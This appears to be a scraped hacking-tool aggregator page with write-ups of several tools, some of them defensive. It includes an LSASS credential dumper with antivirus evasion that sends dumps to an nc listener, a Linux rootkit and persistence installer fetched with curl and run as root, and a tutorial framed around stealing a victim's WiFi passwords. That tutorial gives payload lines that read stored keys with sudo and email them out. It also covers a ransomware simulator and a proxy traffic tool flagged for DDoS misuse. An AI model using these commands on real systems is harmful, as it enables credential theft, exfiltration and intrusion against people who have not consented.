β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
└─────────────┴──────── β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”˜

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All informations and codes are provided solely for educational purposes and/or testing your own systems.

Contact

For any inquiry, please contact the email address as follows:

catsploit@nk.MitsubishiElectric.co.jp



PPLBlade - Protected Process Dumper Tool

By: Zion3R


Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade


Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

By: Zion3R


Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


Features:

  1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
  2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
  3. Save to File: Save the list of validated proxies to a file for future use.

Usage:

  1. Clone the Repository:

    git clone https://github.com/spyboy-productions/Valid8Proxy.git
  2. Navigate to the Directory:

    cd Valid8Proxy
  3. Install Dependencies:

    pip install -r requirements.txt
  4. Run the Tool:

    python Valid8Proxy.py
  5. Follow Interactive Prompts:

    • Enter the number of proxies you want to print.
    • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
  6. Save to File:

    • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
  7. Check Results:

    • Review the working proxies in the terminal with color-coded output.
    • Find the list of working proxies saved in "proxies.txt."

If you already have proxies just want to validate usee this:

python Validator.py

Follow the prompts:

Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.

Contribution:

Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

Snapshots:

If you find this GitHub repo useful, please consider giving it a star!



D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R


Demonized Shell is an Advanced Tool for persistence in linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
  • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  1. Install dependencies:
pip3 install -r requirements.txt
  1. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star!Β 



RansomwareSim - A Simulated Ransomware

By: Zion3R

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates&Delete a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.

Usage

Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt

ο“– My Book

Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

ο’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Pantheon - Insecure Camera Parser

By: Zion3R


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully indepenent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As last year, this year we made a ranking with the most popular tools between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R


VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.

Introduction

eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating each return address matches a known callsite.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.


How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.

wCFI

wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.

PSD

PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.

Prerequsites

VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics

Conclusion

VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real-time and analyzed to identify emerging kernel threats for cloud native envionrment.



Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R


Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.


Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

Benchmark

Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

Test Name Hydra Tasks Hydra Time Legba Tasks Legba Time
HTTP basic auth 16 7.100s 10 1.560s (οš€ 4.5x faster)
HTTP POST login (wordpress) 16 14.854s 10 5.045s (οš€ 2.9x faster)
SSH 16 7m29.85s * 10 8.150s (οš€ 55.1x faster)
MySQL 4 ** 9.819s 4 ** 2.542s (οš€ 3.8x faster)
Microsoft SQL 16 7.609s 10 4.789s (οš€ 1.5x faster)

* While this result would suggest a default delay between connection attempts used by Hydra. I've tried to study the source code to find such delay but to my knowledge there's none. For some reason it's simply very slow.
** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

License

Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

By: Zion3R


Little AV/EDR Evasion Lab for training & learning purposes. (️ under construction..)​

 ____            _     _____ ____  ____     ___   __   _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),

Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

        Usage: BestEdrOfTheMarket.exe [args]

/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


Blutter - Flutter Mobile Application Reverse Engineering Tool

By: Zion3R


Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

Currently the application supports only Android libapp.so (arm64 only). Also the application is currently work only against recent Dart versions.

For high priority missing features, see TODO


Environment Setup

This application uses C++20 Formatting library. It requires very recent C++ compiler such as g++>=13, Clang>=15.

I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.

Debian Unstable (gcc 13)

  • Install build tools and depenencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev

Windows

  • Install git and python 3
  • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
  • Install required libraries (libcapstone and libicu4c)
python scripts\init_env_win.py
  • Start "x64 Native Tools Command Prompt"

macOS Ventura (clang 15)

  • Install XCode
  • Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests

Usage

Extract "lib" directory from apk file

python3 blutter.py path/to/app/lib/arm64-v8a out_dir

The blutter.py will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from libapp.so.

If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.

Update

You can use git pull to update and run blutter.py with --rebuild option to force rebuild the executable

python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild

Output files

  • asm/* libapp assemblies with symbols
